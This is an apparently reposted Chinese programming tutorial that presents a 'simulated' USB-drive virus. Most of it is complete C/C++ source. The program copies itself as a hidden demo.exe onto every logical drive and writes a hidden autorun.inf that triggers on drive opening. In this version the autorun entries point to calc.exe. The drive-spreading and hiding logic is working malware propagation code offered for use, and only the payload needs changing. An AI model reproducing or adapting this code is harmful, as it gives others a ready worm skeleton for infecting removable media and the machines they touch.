Home>Article>Backend Development> The simplest simulated U disk virus (Autorun.inf)

The simplest simulated U disk virus (Autorun.inf)

黄舟
黄舟 Original
2017-01-22 14:18:22 2263browse

autorun.inf是我们电脑使用中比较常见的系统文件 ,其作用是允许在双击磁盘时自动运行指定的某个文件。
下面介绍几个API函数
1.DWORD GetLogicalDriveStrings(DWORD nBufferLength, // size of bufferLPTSTR lpBuffer // drive strings buffer);
2.char *strncpy(char *dest,char *src,size_t n);第1个参数:char *strDest目的字符串指针。 第2个参数:const char *strSource源字符串指针。 第3个参数:size_t count 拷贝长度。 返回值:目的字符串指针。
下面是C/C++代码

#define _CRT_SECURE_NO_WARNINGS #include  char *gstrAutoRun = "[autorun]\ \r\nopen=calc.exe \ \r\nshell\\open\\Command=calc.exe \ \r\nshell\\explore=资源管理器(&X) \ \r\nshell\\explore\\Command=calc.exe \ \r\nshellexecute=calc.exe\ \r\nshell\\Auto\\Command=calc.exe"; void Infect(char *pstrFilePath) { char strDriveStrings[MAXBYTE] = { 0 }; DWORD dwDriveStrLen = GetLogicalDriveStringsA(MAXBYTE, strDriveStrings); DWORD dwError = 0; for (size_t i = 0; i < dwDriveStrLen; i += 4) { char strTargetPath[MAX_PATH] = { 0 }, strRoot[4] = { 0 }; strncpy(strRoot, &strDriveStrings[i], 4); strcpy(strTargetPath, strRoot); strcat(strTargetPath, "demo.exe"); if (!CopyFileA(pstrFilePath,strTargetPath,false)) { dwError = GetLastError(); } SetFileAttributesA(strTargetPath, FILE_ATTRIBUTE_HIDDEN); strcpy(strTargetPath, strRoot); strcat(strTargetPath, "autorun.inf"); HANDLE hFile = CreateFileA(strTargetPath, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,nullptr); DWORD dwLen = 0; WriteFile(hFile, gstrAutoRun, strlen(gstrAutoRun), &dwLen, nullptr); CloseHandle(hFile); } } int main() { char strSelfPath[MAX_PATH] = { 0 }; GetModuleFileNameA(nullptr, strSelfPath, MAX_PATH); Infect(strSelfPath); return 0; }

以上就是 最简单的模拟U盘病毒(Autorun.inf)的内容,更多相关内容请关注PHP中文网(m.sbmmt.com)!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn